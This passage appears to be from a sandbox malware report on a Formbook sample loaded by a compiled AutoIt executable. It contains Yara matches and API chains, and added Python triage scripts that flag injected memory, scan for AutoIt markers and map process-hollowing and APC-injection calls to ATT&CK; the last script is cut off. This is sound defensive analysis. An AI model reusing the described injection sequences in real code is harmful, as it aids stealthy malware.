          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F16B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_00F16B0C
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F02B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_00F02B37
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F2F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_00F2F7FF

          E-Banking Fraud

          Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: file.exe PID: 5324, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 5020, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: wlanext.exe PID: 2924, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
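          The dump identifiers above encode where each Yara hit was found, which is the first thing to check when triaging: a Formbook rule firing in executable memory that is not a loaded image inside svchost.exe or wlanext.exe is the unpacked, injected payload, while the hit in file.exe sits in read/write private memory that the AutoIt loader filled. The Python script below is added here as an example and is not part of the Joe Sandbox report; it parses the dump names and rule lines from this page and flags those regions. The field layout of the dump name and the process-index mapping are assumptions drawn from the identifiers on this page (index 0 = file.exe, 1 = svchost.exe, 2 = explorer.exe, 4 = wlanext.exe, matching the N_2_ function references); the PAGE_* and MEM_* values are the documented Windows constants.

```python
import re
from collections import defaultdict

# Process index -> image name, taken from this report's own "<idx>_2_<addr>" references and PID lines.
PROCESS_NAMES = {0: "file.exe", 1: "svchost.exe", 2: "explorer.exe", 4: "wlanext.exe"}

# Documented Windows constants for page protection and region type.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE"}

# A dump id is eight dot-separated hex fields followed by ".sdmp".
SDMP_RE = re.compile(r"(?P<id>[0-9A-Fa-f]+(?:\.[0-9A-Fa-f]+){7})\.sdmp")
RULE_RE = re.compile(r"Matched rule:\s*(?P<rule>.+?)\s+Author:")

# Lines copied from the report above (a "Yara match" entry and three "Matched rule" entries).
REPORT_LINES = [
    "Source: Yara match | File source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown",
    "Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group",
    "Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com",
]


def parse_sdmp_name(dump_id):
    """Decode one dump identifier. ASSUMPTION about the Joe Sandbox naming scheme:
    field 0 is the process index, field 3 the region base address, field 4 the page
    protection and field 6 the MEM_* region type. The other fields are ignored."""
    f = [int(x, 16) for x in dump_id.split(".")]
    return {
        "process": PROCESS_NAMES.get(f[0], "process#%d" % f[0]),
        "base": f[3],
        "protect": PAGE_PROTECT.get(f[4], hex(f[4])),
        "mem_type": MEM_TYPE.get(f[6], hex(f[6])),
    }


def triage(lines):
    """Collect rule hits per dump and flag executable memory that is not a loaded image:
    a Yara hit in such a region is the unpacked payload, not the file on disk."""
    rules_by_dump = defaultdict(set)
    for line in lines:
        m = SDMP_RE.search(line)
        if not m:
            continue
        r = RULE_RE.search(line)
        rules = rules_by_dump[m.group("id")]
        if r:
            rules.add(r.group("rule"))
    result = {}
    for dump_id, rules in rules_by_dump.items():
        info = parse_sdmp_name(dump_id)
        info["rules"] = sorted(rules)
        info["likely_injected"] = (info["protect"] in EXECUTABLE
                                   and info["mem_type"] != "MEM_IMAGE")
        result[dump_id] = info
    return result


if __name__ == "__main__":
    for dump_id, info in triage(REPORT_LINES).items():
        print("%-12s base=0x%08X %-22s %-11s injected=%-5s rules=%s" % (
            info["process"], info["base"], info["protect"], info["mem_type"],
            info["likely_injected"], ", ".join(info["rules"])))
```

          Run against the full report text, the script separates the RWX mapped regions in svchost.exe and wlanext.exe (the section-mapped payload) from the PAGE_READWRITE private buffer in file.exe, which is where the loader decrypted Formbook before injecting it.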
          Source: C:\Users\user\Desktop\file.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00EC3D19
          Source: file.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: file.exe, 00000000.00000000.1643073757.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_2fef0498-7
          Source: file.exe, 00000000.00000000.1643073757.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_f13b12ba-d
          Source: file.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_6828ed0c-9
          Source: file.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_24114dda-3
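          The banner string in these entries is what the "Binary is likely a compiled AutoIt script file" signature keys on: the AutoIt3 interpreter stub embeds it, and the sample is that stub with a compiled script appended. The Python scanner below is an added example, not code from the report or from AutoIt; it searches a file for the banner in both ANSI and UTF-16LE form (Joe Sandbox lists both string kinds) and for the AU3!EA06 signature that precedes the embedded script in AutoIt3 binaries. The sample buffer is constructed for the demonstration and is not file.exe.

```python
# Markers carried by compiled AutoIt3 executables: the banner string reported above,
# and the "AU3!EA06" signature that precedes the embedded compiled script.
AUTOIT_MARKERS = {
    "autoit_banner": b"This is a third-party compiled AutoIt script.",
    "au3_script_signature": b"AU3!EA06",
}


def _encodings(pattern):
    # The banner may be stored as ANSI or as UTF-16LE (the report lists both string types).
    return (("ascii", pattern),
            ("utf-16le", pattern.decode("ascii").encode("utf-16-le")))


def scan_autoit_markers(data):
    """Return every (marker name, encoding, byte offset) hit in the buffer, sorted by offset."""
    hits = []
    for name, pattern in AUTOIT_MARKERS.items():
        for encoding, needle in _encodings(pattern):
            off = data.find(needle)
            while off != -1:
                hits.append((name, encoding, off))
                off = data.find(needle, off + 1)
    return sorted(hits, key=lambda h: h[2])


def is_compiled_autoit(data):
    """True when either marker is present. This says 'compiled AutoIt', not 'malicious':
    the sandbox flags it because AutoIt is a common loader for payloads such as Formbook."""
    names = {h[0] for h in scan_autoit_markers(data)}
    return "autoit_banner" in names or "au3_script_signature" in names


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_autoit_markers(fh.read())


# CONSTRUCTED sample buffer (not the real file.exe): a fake header, the banner in UTF-16LE,
# then the AU3! signature, so the scanner can be exercised offline.
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 16
          + "This is a third-party compiled AutoIt script.".encode("utf-16-le")
          + b"\x00" * 8 + b"AU3!EA06" + b"\x00" * 32)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for name, encoding, off in scan_autoit_markers(data):
        print("%-22s %-8s offset 0x%X" % (name, encoding, off))
    print("compiled AutoIt:", is_compiled_autoit(data))
```

          Pass a file path to scan a real sample; with no argument the script runs on the constructed buffer. A hit on the AU3! signature is the cue to extract and decompile the embedded script, which is where the loader logic that stages Formbook lives.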
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72E80 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72FB0 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72F90 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F74340 NtSetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F74650 NtSuspendThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72BE0 NtQueryValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72C70 NtFreeVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72C60 NtCreateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F72D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73090 NtSetValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F735C0 NtCreateMutant
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F739B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73D70 NtOpenThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F73D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA330 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA3E0 NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA460 NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA32C NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA383 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA45A NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA50A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA58A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_024AA58C NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E0A042 NtQueryInformationProcess
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BCE12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BB232 NtCreateFile
          Source: C:\Windows\explorer.exe | Code function: 2_2_0E5BCE0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00DDF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2BE0 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2C60 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2C70 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2CA0 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A35C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A4340 NtSetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A4650 NtSuspendThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A2CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A3010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A3090 NtSetValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A39B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A3D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_032A3D70 NtOpenThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA3E0 NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA330 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA460 NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA383 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA32C NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA45A NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA58A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA58C NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_00ABA50A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03099BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0309A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_03099BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4_2_0309A042 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F06685 CreateFileW,DeviceIoControl,CloseHandle
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
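          The API chains listed for svchost.exe and wlanext.exe are the evidence behind the "process hollowing", "thread injection" and "Queues an APC" signatures at the top of the report: NtCreateSection/NtMapViewOfSection/NtUnmapViewOfSection maps a section into the target (the RWX mapped regions the Yara rules hit), and NtSuspendThread/NtSetContextThread/NtQueueApcThread/NtResumeThread hands execution to it. The clipboard and GetAsyncKeyState chains in file.exe are the AutoIt runtime's own capabilities rather than Formbook's. The script below is an added example, not Joe Sandbox's signature logic; it parses evidence lines in the format used on this page (with or without the " | " cell separator) and maps each chain to the behaviour it indicates. The ATT&CK ids are from the MITRE matrix; the rule sets are the example's own choice and deliberately require the full API sequence for the injection techniques so that a lone NtMapViewOfSection does not fire.

```python
import re

# One rule per behaviour: (ATT&CK technique id, label, APIs that must all appear in one chain).
RULES = [
    ("T1055.012", "process hollowing / section-mapping injection",
     {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"}),
    ("T1055.003", "thread execution hijacking",
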